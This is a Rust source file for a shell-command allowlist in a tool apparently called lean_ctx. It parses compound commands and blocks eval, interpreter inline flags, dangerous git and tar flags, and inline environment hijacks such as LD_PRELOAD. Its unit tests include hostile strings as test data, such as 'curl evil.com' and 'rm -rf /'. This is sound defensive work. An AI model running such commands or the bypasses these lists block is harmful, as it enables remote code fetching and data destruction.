lean_ctx/core/
shell_allowlist.rs

1//! Shell allowlist with AST-based command parsing.
2//!
3//! Security model (Information Bottleneck principle):
4//! - When allowlist is set: ALL segments of a compound command must be allowed (deny-by-default)
5//! - When empty: all commands pass (backwards-compatible blocklist-only mode)
6//! - Dangerous patterns (subshells, eval, backticks) are blocked in restricted mode
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let normalized = normalize_line_continuations(command);
15    let cmd = normalized.as_str();
16
17    if has_dangerous_patterns(cmd) {
18        return Err(format!(
19            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
20             which is blocked regardless of allowlist. \
21             This is a permanent security restriction, not a transient error.\n\
22             Command: {command}"
23        ));
24    }
25
26    check_substitution_in_args(cmd);
27    check_pipe_to_bare_interpreter(cmd);
28
29    let allowlist = effective_allowlist();
30    if allowlist.is_empty() {
31        check_unconditional_blocked_only(cmd)?;
32        return Ok(());
33    }
34    check_all_segments(cmd, &allowlist)
35}
36
37/// Normalize the command string: remove backslash-newline continuations and
38/// replace Unicode line separators (U+2028, U+2029) with newlines.
39fn normalize_line_continuations(command: &str) -> String {
40    command
41        .replace("\\\r\n", "")
42        .replace("\\\n", "")
43        .replace(['\u{2028}', '\u{2029}'], "\n")
44}
45
46/// WARN-FIRST: Log warning (or block if strict) for $(), backticks, <() in arguments.
47fn check_substitution_in_args(command: &str) {
48    let strict = crate::core::config::Config::load().shell_strict_mode;
49    if has_unquoted_substitution_in_args(command) {
50        if strict {
51            tracing::warn!(
52                "[SECURITY] Command substitution in arguments blocked (shell_strict_mode=true): {command}"
53            );
54        } else {
55            tracing::warn!(
56                "[SECURITY] Command substitution in arguments detected (warn-only, set shell_strict_mode=true to block): {command}"
57            );
58        }
59    }
60}
61
62/// Check for $(), backticks, <(, >( outside of command position, outside quotes.
63fn has_unquoted_substitution_in_args(command: &str) -> bool {
64    let bytes = command.as_bytes();
65    let len = bytes.len();
66    let mut i = 0;
67    let mut in_single_quote = false;
68    let mut in_double_quote = false;
69    let mut past_first_token = false;
70    let mut seen_space_after_cmd = false;
71
72    while i < len {
73        let ch = bytes[i];
74        if in_single_quote {
75            if ch == b'\'' {
76                in_single_quote = false;
77            }
78            i += 1;
79            continue;
80        }
81        if in_double_quote {
82            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
83                in_double_quote = false;
84            }
85            i += 1;
86            continue;
87        }
88        match ch {
89            b'\'' => {
90                in_single_quote = true;
91                i += 1;
92            }
93            b'"' => {
94                in_double_quote = true;
95                i += 1;
96            }
97            b' ' | b'\t' if !past_first_token => {
98                seen_space_after_cmd = true;
99                i += 1;
100            }
101            _ if !seen_space_after_cmd => {
102                i += 1;
103            }
104            _ => {
105                past_first_token = true;
106                if ch == b'$' && i + 1 < len && bytes[i + 1] == b'(' {
107                    return true;
108                }
109                if ch == b'`' {
110                    return true;
111                }
112                if (ch == b'<' || ch == b'>') && i + 1 < len && bytes[i + 1] == b'(' {
113                    return true;
114                }
115                i += 1;
116            }
117        }
118    }
119    false
120}
121
122/// WARN-FIRST: Log warning for piping into bare interpreter (no script file).
123fn check_pipe_to_bare_interpreter(command: &str) {
124    let segments = split_on_operators(command);
125    let pipe_indices: Vec<usize> = {
126        let mut indices = Vec::new();
127        let bytes = command.as_bytes();
128        let len = bytes.len();
129        let mut j = 0;
130        let mut in_sq = false;
131        let mut in_dq = false;
132        while j < len {
133            if in_sq {
134                if bytes[j] == b'\'' {
135                    in_sq = false;
136                }
137                j += 1;
138                continue;
139            }
140            if in_dq {
141                if bytes[j] == b'"' && (j == 0 || bytes[j - 1] != b'\\') {
142                    in_dq = false;
143                }
144                j += 1;
145                continue;
146            }
147            match bytes[j] {
148                b'\'' => {
149                    in_sq = true;
150                    j += 1;
151                }
152                b'"' => {
153                    in_dq = true;
154                    j += 1;
155                }
156                b'|' if j + 1 < len && bytes[j + 1] != b'|' => {
157                    indices.push(j);
158                    j += 1;
159                }
160                _ => {
161                    j += 1;
162                }
163            }
164        }
165        indices
166    };
167    let _ = pipe_indices;
168
169    for (idx, seg) in segments.iter().enumerate() {
170        if idx == 0 {
171            continue;
172        }
173        if is_bare_interpreter_stdin(seg) {
174            let base = extract_base_from_segment(seg);
175            let strict = crate::core::config::Config::load().shell_strict_mode;
176            if strict {
177                tracing::warn!(
178                    "[SECURITY] Pipe to bare interpreter '{base}' blocked (shell_strict_mode=true)"
179                );
180            } else {
181                tracing::warn!("[SECURITY] Pipe to bare interpreter '{base}' detected (warn-only)");
182            }
183        }
184    }
185}
186
187/// For empty allowlists: still enforce UNCONDITIONAL_BLOCKED commands.
188fn check_unconditional_blocked_only(command: &str) -> Result<(), String> {
189    let segments = extract_all_commands(command);
190    for seg in &segments {
191        let base = extract_base_from_segment(seg);
192        if !base.is_empty() && UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
193            return Err(format!(
194                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
195                 regardless of allowlist configuration.\n\
196                 Command: {command}"
197            ));
198        }
199        check_inline_env_block(seg)?;
200        check_interpreter_eval_only(seg)?;
201        check_dangerous_flags(seg)?;
202    }
203    Ok(())
204}
205
206/// Tokenize a shell command segment respecting single/double quotes and backslash escapes.
207/// Returns tokens with outer quotes stripped, matching how the shell would parse them.
208/// E.g. `git -C "Program Files" status` → `["git", "-C", "Program Files", "status"]`
209pub fn shell_tokenize(input: &str) -> Vec<String> {
210    let mut tokens = Vec::new();
211    let mut current = String::new();
212    let mut chars = input.chars().peekable();
213    let mut in_single = false;
214    let mut in_double = false;
215
216    while let Some(c) = chars.next() {
217        match c {
218            '\'' if !in_double => in_single = !in_single,
219            '"' if !in_single => in_double = !in_double,
220            '\\' if !in_single => {
221                if let Some(next) = chars.next() {
222                    current.push(next);
223                }
224            }
225            c if c.is_whitespace() && !in_single && !in_double => {
226                if !current.is_empty() {
227                    tokens.push(std::mem::take(&mut current));
228                }
229            }
230            _ => current.push(c),
231        }
232    }
233    if !current.is_empty() {
234        tokens.push(current);
235    }
236    tokens
237}
238
239/// Returns the byte length of the first shell token in `input`, respecting quotes.
240/// Used by `skip_env_assignments` to advance past env assignments with quoted values
241/// like `FOO="bar baz"`.
242fn quote_aware_token_end(input: &str) -> usize {
243    let bytes = input.as_bytes();
244    let len = bytes.len();
245    let mut i = 0;
246    let mut in_single = false;
247    let mut in_double = false;
248
249    while i < len {
250        let ch = bytes[i];
251        match ch {
252            b'\'' if !in_double => {
253                in_single = !in_single;
254                i += 1;
255            }
256            b'"' if !in_single => {
257                in_double = !in_double;
258                i += 1;
259            }
260            b'\\' if !in_single => {
261                i = (i + 2).min(len);
262            }
263            b if b.is_ascii_whitespace() && !in_single && !in_double => return i,
264            _ => i += 1,
265        }
266    }
267    len
268}
269
270/// Like `check_interpreter_abuse` but only checks for eval flags on interpreters.
271/// Skips delegation-command checks (which require an allowlist for membership test).
272/// Used in blocklist-only mode where there is no allowlist.
273fn check_interpreter_eval_only(segment: &str) -> Result<(), String> {
274    let trimmed = skip_env_assignments(segment.trim());
275    let tokens = shell_tokenize(trimmed);
276    if tokens.is_empty() {
277        return Ok(());
278    }
279    let base = tokens[0]
280        .rsplit('/')
281        .next()
282        .unwrap_or(&tokens[0])
283        .to_string();
284    if !INTERPRETER_COMMANDS.contains(&base.as_str()) {
285        return Ok(());
286    }
287    for tok in &tokens[1..] {
288        if EVAL_FLAGS.contains(&tok.as_str()) {
289            return Err(format!(
290                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
291                 flag '{tok}' is blocked. Use a script file instead.\n\
292                 This is a permanent security restriction."
293            ));
294        }
295        if has_eval_flag_prefix(tok) {
296            return Err(format!(
297                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
298                 containing eval flag is blocked.\n\
299                 This is a permanent security restriction."
300            ));
301        }
302    }
303    if tokens[1..].iter().any(|t| t.contains("<<")) {
304        return Err(format!(
305            "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
306             Use a script file instead.\n\
307             This is a permanent security restriction."
308        ));
309    }
310    Ok(())
311}
312
313/// Commands that are unconditionally blocked regardless of allowlist membership.
314/// These provide direct arbitrary code execution or re-enter the shell.
315const UNCONDITIONAL_BLOCKED: &[&str] = &["eval", "exec", "source", "."];
316
317/// Interpreters that can execute arbitrary code via -c/-e flags.
318const INTERPRETER_COMMANDS: &[&str] = &[
319    "python", "python3", "python2", "node", "ruby", "perl", "lua", "php", "bash", "sh", "zsh",
320    "fish", "dash", "ksh",
321];
322
323/// Flags that indicate inline code execution for interpreters.
324const EVAL_FLAGS: &[&str] = &[
325    "-c", "-e", "-r", "-p", "--eval", "--exec", "-exec", "--print", "--run",
326];
327
328/// Script file extensions that indicate a file argument (not stdin execution).
329const SCRIPT_EXTENSIONS: &[&str] = &[
330    ".py", ".rb", ".js", ".ts", ".pl", ".lua", ".php", ".sh", ".bash", ".zsh", ".mjs", ".cjs",
331    ".tsx", ".jsx",
332];
333
334/// Commands that delegate to another command (the delegated command must also be allowed).
335const DELEGATION_COMMANDS: &[&str] = &["env", "nice", "timeout", "sudo", "doas"];
336
337/// Check if a segment uses an interpreter with an eval flag, or a delegation command
338/// whose target is not in the allowlist.
339fn check_interpreter_abuse(segment: &str, allowlist: &[String]) -> Result<(), String> {
340    check_interpreter_abuse_inner(segment, allowlist, 0)
341}
342
343fn check_interpreter_abuse_inner(
344    segment: &str,
345    allowlist: &[String],
346    depth: usize,
347) -> Result<(), String> {
348    if depth > 3 {
349        return Ok(());
350    }
351    let trimmed = skip_env_assignments(segment.trim());
352    let tokens = shell_tokenize(trimmed);
353    if tokens.is_empty() {
354        return Ok(());
355    }
356
357    let base = tokens[0]
358        .rsplit('/')
359        .next()
360        .unwrap_or(&tokens[0])
361        .to_string();
362
363    if INTERPRETER_COMMANDS.contains(&base.as_str()) {
364        for tok in &tokens[1..] {
365            if EVAL_FLAGS.contains(&tok.as_str()) {
366                return Err(format!(
367                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
368                     flag '{tok}' is blocked. Use a script file instead.\n\
369                     This is a permanent security restriction."
370                ));
371            }
372            if has_eval_flag_prefix(tok) {
373                return Err(format!(
374                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
375                     containing eval flag is blocked.\n\
376                     This is a permanent security restriction."
377                ));
378            }
379        }
380        if tokens[1..].iter().any(|t| t.contains("<<")) {
381            return Err(format!(
382                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
383                 Use a script file instead.\n\
384                 This is a permanent security restriction."
385            ));
386        }
387    }
388
389    if DELEGATION_COMMANDS.contains(&base.as_str()) {
390        let rest_tokens: Vec<&str> = tokens[1..]
391            .iter()
392            .map(std::string::String::as_str)
393            .skip_while(|t| t.starts_with('-') || t.contains('='))
394            .collect();
395        if let Some(&delegated_tok) = rest_tokens.first() {
396            let delegated = delegated_tok.rsplit('/').next().unwrap_or(delegated_tok);
397            if !delegated.is_empty() && !allowlist.iter().any(|a| a == delegated) {
398                return Err(format!(
399                    "[BLOCKED — DO NOT RETRY] '{base}' delegates to '{delegated}' which is not \
400                     in the shell allowlist. This is a permanent restriction."
401                ));
402            }
403            let rest_str = rest_tokens.join(" ");
404            check_interpreter_abuse_inner(&rest_str, allowlist, depth + 1)?;
405        }
406    }
407
408    Ok(())
409}
410
411/// Check for combined flags like -pe, -ne, -ce that contain eval characters.
412fn has_eval_flag_prefix(token: &str) -> bool {
413    if !token.starts_with('-') || token.starts_with("--") || token.len() < 3 {
414        return false;
415    }
416    let flag_chars = &token[1..];
417    let eval_chars = ['c', 'e', 'r', 'p'];
418    flag_chars.chars().any(|c| eval_chars.contains(&c))
419}
420
421/// Check if a segment is a bare interpreter after a pipe (no script file argument).
422fn is_bare_interpreter_stdin(segment: &str) -> bool {
423    let trimmed = skip_env_assignments(segment.trim());
424    let tokens = shell_tokenize(trimmed);
425    if tokens.is_empty() {
426        return false;
427    }
428    let base = tokens[0]
429        .rsplit('/')
430        .next()
431        .unwrap_or(&tokens[0])
432        .to_string();
433    if !INTERPRETER_COMMANDS.contains(&base.as_str()) {
434        return false;
435    }
436    !tokens[1..]
437        .iter()
438        .any(|t| !t.starts_with('-') && SCRIPT_EXTENSIONS.iter().any(|ext| t.ends_with(ext)))
439}
440
441/// Dangerous flag patterns for specific commands.
442const DANGEROUS_GIT_FLAGS: &[&str] = &[
443    "--upload-pack",
444    "--receive-pack",
445    "--config=core.sshcommand",
446    "--config=core.gitproxy",
447];
448
449const DANGEROUS_TAR_FLAGS: &[&str] = &["--to-command", "--use-compress-program"];
450
451/// Blocked inline environment assignments that can hijack execution.
452const BLOCKED_INLINE_ENV: &[&str] = &[
453    "PATH=",
454    "GIT_ASKPASS=",
455    "GIT_SSH=",
456    "GIT_SSH_COMMAND=",
457    "GIT_EDITOR=",
458    "GIT_EXTERNAL_DIFF=",
459    "SSH_ASKPASS=",
460    "LD_PRELOAD=",
461    "DYLD_INSERT_LIBRARIES=",
462];
463
464fn check_dangerous_flags(segment: &str) -> Result<(), String> {
465    let trimmed = skip_env_assignments(segment.trim());
466    let tokens = shell_tokenize(trimmed);
467    if tokens.is_empty() {
468        return Ok(());
469    }
470    let base = tokens[0]
471        .rsplit('/')
472        .next()
473        .unwrap_or(&tokens[0])
474        .to_string();
475
476    match base.as_str() {
477        "git" => {
478            for tok in &tokens[1..] {
479                for flag in DANGEROUS_GIT_FLAGS {
480                    if tok.starts_with(flag) {
481                        return Err(format!(
482                            "[BLOCKED — DO NOT RETRY] 'git' with dangerous flag '{tok}' is blocked.\n\
483                             This is a permanent security restriction."
484                        ));
485                    }
486                }
487            }
488        }
489        "tar" => {
490            for tok in &tokens[1..] {
491                for flag in DANGEROUS_TAR_FLAGS {
492                    if tok.starts_with(flag) {
493                        return Err(format!(
494                            "[BLOCKED — DO NOT RETRY] 'tar' with dangerous flag '{tok}' is blocked.\n\
495                             This is a permanent security restriction."
496                        ));
497                    }
498                }
499            }
500        }
501        "find" => {
502            for tok in &tokens[1..] {
503                if tok == "-exec" || tok == "-execdir" {
504                    return Err(format!(
505                        "[BLOCKED — DO NOT RETRY] 'find' with '{tok}' is blocked. \
506                         Use 'find ... -print' and pipe to xargs instead.\n\
507                         This is a permanent security restriction."
508                    ));
509                }
510            }
511        }
512        "awk" | "gawk" | "mawk" => {
513            for tok in &tokens[1..] {
514                if tok.contains("system(") {
515                    return Err(format!(
516                        "[BLOCKED — DO NOT RETRY] '{base}' with 'system()' call is blocked.\n\
517                         This is a permanent security restriction."
518                    ));
519                }
520            }
521        }
522        _ => {}
523    }
524    Ok(())
525}
526
527fn check_inline_env_block(segment: &str) -> Result<(), String> {
528    let trimmed = segment.trim();
529    for blocked in BLOCKED_INLINE_ENV {
530        if trimmed.starts_with(blocked) {
531            return Err(format!(
532                "[BLOCKED — DO NOT RETRY] Inline environment override '{blocked}' is blocked.\n\
533                 This is a permanent security restriction."
534            ));
535        }
536    }
537    Ok(())
538}
539
540fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
541    if allowlist.is_empty() {
542        return Ok(());
543    }
544
545    if has_dangerous_patterns(command) {
546        return Err(format!(
547            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
548             which is blocked in restricted mode. \
549             This is a permanent security restriction, not a transient error.\n\
550             Command: {command}"
551        ));
552    }
553
554    let segments = extract_all_commands(command);
555    if segments.is_empty() {
556        return Err("[BLOCKED — DO NOT RETRY] Empty command".to_string());
557    }
558
559    for seg in &segments {
560        check_inline_env_block(seg)?;
561        let base = extract_base_from_segment(seg);
562        if base.is_empty() {
563            continue;
564        }
565        if UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
566            return Err(format!(
567                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
568                 regardless of allowlist membership. \
569                 This is a permanent security restriction.\n\
570                 Command: {command}"
571            ));
572        }
573        check_interpreter_abuse(seg, allowlist)?;
574        check_dangerous_flags(seg)?;
575        if !allowlist.iter().any(|a| a == &base) {
576            return Err(format!(
577                "[BLOCKED — DO NOT RETRY] '{base}' is not in the shell allowlist. \
578                 This is a permanent restriction, not a transient error.\n\
579                 Fix: add '{base}' to shell_allowlist in ~/.lean-ctx/config.toml\n\
580                 Or disable the allowlist: shell_allowlist = []\n\
581                 Do NOT retry this command — it will fail again with the same error."
582            ));
583        }
584    }
585    Ok(())
586}
587
588/// Detect dangerous shell patterns that bypass allowlist intent.
589///
590/// Only blocks patterns that are genuinely dangerous at command position.
591/// `$()` and backticks in *arguments* are allowed — the base command is
592/// already validated by the allowlist, and blocking substitutions in
593/// arguments breaks legitimate workflows (e.g. `git commit -m "$(cat ...)"`,
594/// pre-commit hooks, playwright scripts).
595fn has_dangerous_patterns(command: &str) -> bool {
596    let trimmed = command.trim();
597
598    for blocked in UNCONDITIONAL_BLOCKED {
599        let with_space = format!("{blocked} ");
600        if trimmed.starts_with(&with_space) {
601            return true;
602        }
603        for sep in ["; ", "&& ", "|| ", "| ", "\n"] {
604            if trimmed.contains(&format!("{sep}{blocked} ")) {
605                return true;
606            }
607        }
608    }
609
610    if has_substitution_at_command_pos(trimmed) {
611        return true;
612    }
613
614    false
615}
616
617/// Check if `$()` or backticks appear at command position (first token
618/// of any segment). Substitutions in *arguments* are intentionally
619/// allowed — the security boundary is the base-command allowlist check.
620fn has_substitution_at_command_pos(command: &str) -> bool {
621    let segments = split_on_operators(command);
622    for seg in segments {
623        let trimmed = seg.trim();
624        let cmd_start = skip_env_assignments(trimmed);
625
626        if cmd_start.starts_with("$(") {
627            return true;
628        }
629
630        let tokens = shell_tokenize(cmd_start);
631        let first_token = tokens.first().map_or("", std::string::String::as_str);
632        if first_token.starts_with('`') || first_token == "`" {
633            return true;
634        }
635    }
636    false
637}
638
639/// Extract ALL command segments from a compound shell command.
640/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
641fn extract_all_commands(command: &str) -> Vec<String> {
642    split_on_operators(command)
643        .into_iter()
644        .map(|s| s.trim().to_string())
645        .filter(|s| !s.is_empty())
646        .collect()
647}
648
649/// Split command string on shell operators: ;, &&, ||, |
650/// Respects single/double quotes and parentheses nesting.
651fn split_on_operators(command: &str) -> Vec<&str> {
652    let mut segments = Vec::new();
653    let mut start = 0;
654    let bytes = command.as_bytes();
655    let len = bytes.len();
656    let mut i = 0;
657    let mut in_single_quote = false;
658    let mut in_double_quote = false;
659    let mut paren_depth: u32 = 0;
660
661    while i < len {
662        let ch = bytes[i];
663
664        if in_single_quote {
665            if ch == b'\'' {
666                in_single_quote = false;
667            }
668            i += 1;
669            continue;
670        }
671
672        if in_double_quote {
673            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
674                in_double_quote = false;
675            }
676            i += 1;
677            continue;
678        }
679
680        match ch {
681            b'\'' => {
682                in_single_quote = true;
683                i += 1;
684            }
685            b'"' => {
686                in_double_quote = true;
687                i += 1;
688            }
689            b'(' => {
690                paren_depth += 1;
691                i += 1;
692            }
693            b')' => {
694                paren_depth = paren_depth.saturating_sub(1);
695                i += 1;
696            }
697            b'\n' | b'\r' | b';' if paren_depth == 0 => {
698                segments.push(&command[start..i]);
699                i += 1;
700                start = i;
701            }
702            b'&' if paren_depth == 0 => {
703                if i + 1 < len && bytes[i + 1] == b'&' {
704                    // &&
705                    segments.push(&command[start..i]);
706                    i += 2;
707                    start = i;
708                } else {
709                    // single & (background operator) — still a command separator
710                    segments.push(&command[start..i]);
711                    i += 1;
712                    start = i;
713                }
714            }
715            b'|' if paren_depth == 0 => {
716                if i + 1 < len && bytes[i + 1] == b'|' {
717                    // ||
718                    segments.push(&command[start..i]);
719                    i += 2;
720                    start = i;
721                } else {
722                    // pipe
723                    segments.push(&command[start..i]);
724                    i += 1;
725                    start = i;
726                }
727            }
728            _ => {
729                i += 1;
730            }
731        }
732    }
733
734    if start < len {
735        segments.push(&command[start..]);
736    }
737
738    segments
739}
740
741/// Extract the base command name from a single segment (no operators).
742fn extract_base_from_segment(segment: &str) -> String {
743    let trimmed = segment.trim();
744    if trimmed.is_empty() {
745        return String::new();
746    }
747
748    let cmd_part = skip_env_assignments(trimmed);
749    if cmd_part.is_empty() {
750        return String::new();
751    }
752
753    let tokens = shell_tokenize(cmd_part);
754    let first_token = tokens.first().map_or("", std::string::String::as_str);
755
756    first_token
757        .rsplit('/')
758        .next()
759        .unwrap_or(first_token)
760        .to_string()
761}
762
763/// Skip leading KEY=VALUE environment variable assignments.
764/// Uses quote-aware scanning so `FOO="bar baz" git status` correctly
765/// skips the entire `FOO="bar baz"` token.
766fn skip_env_assignments(segment: &str) -> &str {
767    let mut rest = segment;
768    loop {
769        let rest_trimmed = rest.trim_start();
770        if rest_trimmed.is_empty() {
771            return rest_trimmed;
772        }
773        let end = quote_aware_token_end(rest_trimmed);
774        if end == 0 {
775            return rest_trimmed;
776        }
777        let raw_token = &rest_trimmed[..end];
778        let unquoted: String = raw_token
779            .chars()
780            .filter(|c| *c != '"' && *c != '\'')
781            .collect();
782        if unquoted.contains('=')
783            && !unquoted.starts_with('-')
784            && !unquoted.starts_with('/')
785            && !unquoted.starts_with('.')
786        {
787            rest = &rest_trimmed[end..];
788        } else {
789            return rest_trimmed;
790        }
791    }
792}
793
794fn effective_allowlist() -> Vec<String> {
795    // LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE completely replaces the config (for testing)
796    if let Ok(ov) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE") {
797        return ov
798            .split(',')
799            .map(|s| s.trim().to_string())
800            .filter(|s| !s.is_empty())
801            .collect();
802    }
803    let mut list = crate::core::config::Config::load().shell_allowlist;
804    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
805        for entry in env_val
806            .split(',')
807            .map(|s| s.trim().to_string())
808            .filter(|s| !s.is_empty())
809        {
810            if !list.contains(&entry) {
811                list.push(entry);
812            }
813        }
814    }
815    list
816}
817
818/// Public accessor for extracting all command segments.
819pub fn extract_all_commands_pub(command: &str) -> Vec<String> {
820    extract_all_commands(command)
821}
822
823// Legacy compat: single-segment extraction (used by other callers)
824pub fn extract_base_command(command: &str) -> String {
825    let first_seg = split_on_operators(command)
826        .into_iter()
827        .next()
828        .unwrap_or(command);
829    extract_base_from_segment(first_seg)
830}
831
832#[cfg(test)]
833mod tests {
834    use super::*;
835
836    // --- extract_base_command tests (legacy compat) ---
837
838    #[test]
839    fn extract_simple_command() {
840        assert_eq!(extract_base_command("git status"), "git");
841    }
842
843    #[test]
844    fn extract_with_path() {
845        assert_eq!(extract_base_command("/usr/bin/git log"), "git");
846    }
847
848    #[test]
849    fn extract_with_env_assignment() {
850        assert_eq!(extract_base_command("LANG=en_US git log"), "git");
851    }
852
853    #[test]
854    fn extract_chained_commands() {
855        assert_eq!(extract_base_command("cd /tmp && ls -la"), "cd");
856    }
857
858    #[test]
859    fn extract_piped_command() {
860        assert_eq!(extract_base_command("grep foo | wc -l"), "grep");
861    }
862
863    #[test]
864    fn extract_semicolon_chain() {
865        assert_eq!(extract_base_command("echo hello; rm -rf /"), "echo");
866    }
867
868    #[test]
869    fn extract_empty_command() {
870        assert_eq!(extract_base_command(""), "");
871    }
872
873    #[test]
874    fn extract_whitespace_only() {
875        assert_eq!(extract_base_command("   "), "");
876    }
877
878    #[test]
879    fn extract_multiple_env_vars() {
880        assert_eq!(extract_base_command("FOO=bar BAZ=qux cargo test"), "cargo");
881    }
882
883    // --- All-segments validation tests ---
884
885    fn allow(cmds: &[&str]) -> Vec<String> {
886        cmds.iter().map(std::string::ToString::to_string).collect()
887    }
888
889    #[test]
890    fn allowlist_empty_always_passes() {
891        assert!(check_all_segments("anything", &[]).is_ok());
892    }
893
894    #[test]
895    fn allowlist_blocks_unlisted() {
896        let list = allow(&["git", "cargo"]);
897        let result = check_all_segments("npm install", &list);
898        assert!(result.is_err());
899        assert!(result.unwrap_err().contains("npm"));
900    }
901
902    #[test]
903    fn allowlist_allows_listed() {
904        let list = allow(&["git", "cargo", "npm"]);
905        assert!(check_all_segments("git status", &list).is_ok());
906        assert!(check_all_segments("cargo test --release", &list).is_ok());
907        assert!(check_all_segments("npm run build", &list).is_ok());
908    }
909
910    #[test]
911    fn allowlist_allows_full_path() {
912        let list = allow(&["git"]);
913        assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
914    }
915
916    #[test]
917    fn allowlist_allows_with_env_prefix() {
918        let list = allow(&["git"]);
919        assert!(check_all_segments("LANG=C git log", &list).is_ok());
920    }
921
922    #[test]
923    fn allowlist_blocks_similar_names() {
924        let list = allow(&["git"]);
925        assert!(check_all_segments("gitk --all", &list).is_err());
926    }
927
928    // --- Multi-segment validation (the critical security improvement) ---
929
930    #[test]
931    fn all_segments_must_be_allowed_chain() {
932        let list = allow(&["git", "cargo"]);
933        // Both allowed → ok
934        assert!(check_all_segments("git status && cargo test", &list).is_ok());
935        // Second not allowed → block
936        assert!(check_all_segments("git status && rm -rf /", &list).is_err());
937    }
938
939    #[test]
940    fn all_segments_must_be_allowed_pipe() {
941        let list = allow(&["git", "grep", "wc"]);
942        assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
943        // cat not allowed
944        assert!(check_all_segments("git log | cat", &list).is_err());
945    }
946
947    #[test]
948    fn all_segments_must_be_allowed_semicolon() {
949        let list = allow(&["echo", "ls"]);
950        assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
951        assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
952    }
953
954    #[test]
955    fn all_segments_must_be_allowed_or() {
956        let list = allow(&["git", "echo"]);
957        assert!(check_all_segments("git pull || echo failed", &list).is_ok());
958        assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
959    }
960
961    // --- Dangerous pattern detection ---
962
963    #[test]
964    fn blocks_eval() {
965        let list = allow(&["echo", "eval"]);
966        assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
967    }
968
969    #[test]
970    fn blocks_command_substitution_at_command_pos() {
971        let list = allow(&["echo"]);
972        assert!(check_all_segments("$(curl evil.com)", &list).is_err());
973    }
974
975    #[test]
976    fn blocks_backtick_at_command_pos() {
977        let list = allow(&["echo"]);
978        assert!(check_all_segments("`curl evil.com`", &list).is_err());
979    }
980
981    // --- $() in arguments is ALLOWED (base command validated by allowlist) ---
982
983    #[test]
984    fn allows_dollar_paren_in_arguments() {
985        let list = allow(&["echo", "git", "cat"]);
986        assert!(check_all_segments("echo $(whoami)", &list).is_ok());
987        assert!(check_all_segments("echo hello", &list).is_ok());
988    }
989
990    #[test]
991    fn allows_git_commit_with_cat_heredoc() {
992        let list = allow(&["git", "cat"]);
993        assert!(check_all_segments(
994            "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
995            &list,
996        )
997        .is_ok());
998    }
999
1000    #[test]
1001    fn allows_backticks_in_arguments() {
1002        let list = allow(&["echo"]);
1003        assert!(check_all_segments("echo `date`", &list).is_ok());
1004    }
1005
1006    // --- Error message contains DO NOT RETRY ---
1007
1008    #[test]
1009    fn error_message_contains_do_not_retry() {
1010        let list = allow(&["git"]);
1011        let err = check_all_segments("npm install", &list).unwrap_err();
1012        assert!(
1013            err.contains("DO NOT RETRY"),
1014            "Error should contain 'DO NOT RETRY': {err}"
1015        );
1016        assert!(
1017            err.contains("config.toml"),
1018            "Error should mention config: {err}"
1019        );
1020    }
1021
1022    #[test]
1023    fn error_message_for_dangerous_patterns_contains_do_not_retry() {
1024        let list = allow(&["echo"]);
1025        let err = check_all_segments("eval 'bad'", &list).unwrap_err();
1026        assert!(
1027            err.contains("DO NOT RETRY"),
1028            "Error should contain 'DO NOT RETRY': {err}"
1029        );
1030    }
1031
1032    // --- Issue #294: pre-commit and playwright should work ---
1033
1034    #[test]
1035    fn pre_commit_in_default_allowlist() {
1036        let defaults = crate::core::config::default_shell_allowlist();
1037        assert!(
1038            defaults.contains(&"pre-commit".to_string()),
1039            "pre-commit must be in default allowlist"
1040        );
1041    }
1042
1043    #[test]
1044    fn playwright_in_default_allowlist() {
1045        let defaults = crate::core::config::default_shell_allowlist();
1046        assert!(
1047            defaults.contains(&"playwright".to_string()),
1048            "playwright must be in default allowlist"
1049        );
1050    }
1051
1052    #[test]
1053    fn pre_commit_run_allowed() {
1054        let list = allow(&["pre-commit"]);
1055        assert!(check_all_segments("pre-commit run --all-files", &list).is_ok());
1056    }
1057
1058    #[test]
1059    fn playwright_test_allowed() {
1060        let list = allow(&["npx", "playwright"]);
1061        assert!(check_all_segments("playwright test", &list).is_ok());
1062        assert!(check_all_segments("npx playwright test", &list).is_ok());
1063    }
1064
1065    // --- Quote handling ---
1066
1067    #[test]
1068    fn respects_single_quotes() {
1069        let list = allow(&["echo"]);
1070        assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
1071    }
1072
1073    #[test]
1074    fn respects_double_quotes() {
1075        let list = allow(&["echo"]);
1076        assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
1077    }
1078
1079    // --- split_on_operators ---
1080
1081    #[test]
1082    fn split_simple_pipe() {
1083        let parts = split_on_operators("a | b");
1084        assert_eq!(parts, vec!["a ", " b"]);
1085    }
1086
1087    #[test]
1088    fn split_complex_chain() {
1089        let parts = split_on_operators("a && b || c; d | e");
1090        assert_eq!(parts.len(), 5);
1091    }
1092
1093    #[test]
